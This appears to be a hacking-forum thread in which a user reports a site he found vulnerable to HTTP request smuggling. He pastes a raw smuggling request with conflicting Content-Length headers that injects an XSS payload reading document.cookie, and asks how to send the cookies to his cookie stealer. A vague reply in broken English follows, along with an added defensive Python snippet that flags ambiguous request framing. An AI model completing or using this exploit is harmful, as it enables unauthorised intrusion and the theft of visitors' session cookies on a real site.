Hi, I found a site vulnerable to HTTP request smuggling; it runs an Apache server. I have been looking up information on this all day, yet the stuff that I find doesn't explain it very well! I know that it has to be sent to the site through packets, but what I don't understand is how I could use

[code]
POST /some_script.jsp HTTP/1.0
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Content-Length: 204

this=thatPOST /vuln_page.jsp HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

param1=value1&data=<script>alert("stealing%20your%20data:"%2bdocument.cookie)</script>&foobar=
[/code]

Now I know that does XSS, but how would I get that to redirect to my cookie stealer? Also, would that be what I'm looking for if I want to exploit the server? Well, thank you for spending the time to read this (and I did check Google for the information, but it didn't suffice).

Sincerely,
Crimson-Jolt

PS: I'm using inet crack for spoofing.
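The two differing Content-Length headers in the request above are what make its framing ambiguous. As an added example (not part of the original post), this Python check flags such requests and shows what a parser trusting the first versus the last value leaves on the connection; the sample is constructed from the post's headers with a shortened body, and all function names are hypothetical.

```python
# Added example: detect ambiguous body framing in a raw HTTP/1.x request.

# Constructed sample: the post's header block with a shortened, benign body.
SAMPLE = (
    b"POST /some_script.jsp HTTP/1.0\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 9\r\n"
    b"Content-Length: 204\r\n"
    b"\r\n"
    b"this=thatPOST /vuln_page.jsp HTTP/1.0\r\n"
    b"Content-Length: 13\r\n\r\nparam1=value1"
)

def parse_headers(raw):
    """Split a raw request into ([(name, value), ...], body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    pairs = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(b":")
        pairs.append((name.strip().lower(), value.strip()))
    return pairs, body

def framing_findings(raw):
    """Return the reasons the body length is ambiguous ([] if none)."""
    pairs, _ = parse_headers(raw)
    lengths = [v for n, v in pairs if n == b"content-length"]
    findings = []
    if len(lengths) > 1:
        kind = "conflicting" if len(set(lengths)) > 1 else "duplicate"
        values = b", ".join(lengths).decode("latin-1")
        findings.append(kind + " Content-Length: " + values)
    if any(not v.isdigit() for v in lengths):
        findings.append("non-numeric Content-Length")
    if lengths and any(n == b"transfer-encoding" for n, _ in pairs):
        findings.append("Content-Length together with Transfer-Encoding")
    return findings

def leftover(raw, pick):
    """Bytes left on the connection after a parser that trusts the first
    (pick=0) or last (pick=-1) Content-Length has consumed the body."""
    pairs, body = parse_headers(raw)
    lengths = [int(v) for n, v in pairs
               if n == b"content-length" and v.isdigit()]
    return body[lengths[pick]:] if lengths else body

if __name__ == "__main__":
    print(framing_findings(SAMPLE))
    print("first-CL parser sees next:", leftover(SAMPLE, 0)[:30])
    print("last-CL parser sees next: ", leftover(SAMPLE, -1)[:30])
```

A front end or WAF that rejects any request with a non-empty findings list closes the disagreement before it reaches a back end that picks the other header.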
Sorry, my English is bad)) So if $data is taken from the cookie, then HTTP request smuggling may be done. You can translate this Russian sentence: "If the $data variable is taken from cookies, then HTTP request smuggling may work."
As far as I know, this bug is very stupid =) One day I found this bug in one script, and I couldn't do anything except have the server give me a cookie named as I wanted =) In the docs there was something about how we could set the Location header or something like that..